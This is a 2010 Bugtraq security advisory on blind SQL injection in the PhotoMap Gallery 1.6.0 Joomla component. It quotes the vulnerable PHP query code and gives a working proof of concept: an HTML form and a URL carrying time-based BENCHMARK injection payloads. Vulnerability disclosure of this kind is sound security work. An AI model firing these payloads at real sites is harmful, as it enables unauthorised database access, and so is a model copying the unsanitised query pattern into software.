[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, submit@xxxxxxxxxx
- Subject: PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection
- From: Salvatore Fresta aka Drosophila <drosophilaxxx@xxxxxxxxx>
- Date: Wed, 28 Jul 2010 15:58:56 +0200
PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection
Name PhotoMap Gallery
Vendor http://photoindochina.com
Versions Affected 1.6.0
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-07-28
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
PhotoMap Gallery is a gallery component completely
integrated into Joomla 1.5.x. Like 'Picasa', 'Flickr',
or 'Panoramio', you can easily add geo-tags to your
photos so that you can remember exactly where they're
from using Google Maps.
II. DESCRIPTION
_______________
Some parameters are not properly sanitised before being
used in SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple Blind SQL Injection
A) Multiple Blind SQL Injection
_______________________________
The parameter id passed to controller.php via POST when
view is set to user and task is set to save_usercategory
is not properly sanitised before being used in a SQL
query. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
The parameter folder passed to imagehandler.php is not
properly sanitised before used in a SQL query. This can
be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
The following is the affected code.
controller.php (line 1135):
function save_usercategory() {
// Check for request forgeries
JRequest::checkToken() or jexit( 'Invalid Token' );
$user = & JFactory::getUser();
$task = JRequest::getVar('task');
$post = JRequest::get('post');
//perform access checks
$isNew = ($post['id']) ? false : true;
// $catid = (int) JRequest::getVar('catid', 0);
$db =& JFactory::getDBO();
$query = 'SELECT c.id, c.directory'
. ' FROM #__g_categories AS c'
. ' WHERE c.id = '.$post['id'];
imagehandler.php (line 109);
function getList() {
static $list;
// Only process the list once per request
if (is_array($list)) {
return $list;
}
// Get folder from request
$folder = $this->getState('folder');
$search = $this->getState('search');
$query = 'SELECT *'
. ' FROM #__g_categories'
. ' WHERE id = '.$folder;
IV. SAMPLE CODE
_______________
A) Multiple Blind SQL Injection
Replace 89eb36eca1919aff534b13b54796c9a4 with your own.
<html>
<head>
<title>PoC - PhotoMap Gallery 1.6.0 Blind SQL Injection</title>
</head>
<body>
<form method="POST" action="http://127.0.0.1/joomla/index.php";>
<input type="hidden" name="89eb36eca1919aff534b13b54796c9a4"
value="1">
<input type="hidden" name="option"
value="com_photomapgallery">
<input type="hidden" name="controller" value="">
<input type="hidden" name="view" value="user">
<input type="hidden" name="task" value="save_usercategory">
<input type="hidden" name="id" value="-1 AND
(SELECT(IF(0x41=0x41, BENCHMARK(99999999999,NULL),NULL)))">
<input type="submit">
</form>
</body>
</html>
http://site/path/index.php?option=com_photomapgallery&view=imagehandler&folder=-1
OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
V. FIX
______
No fix.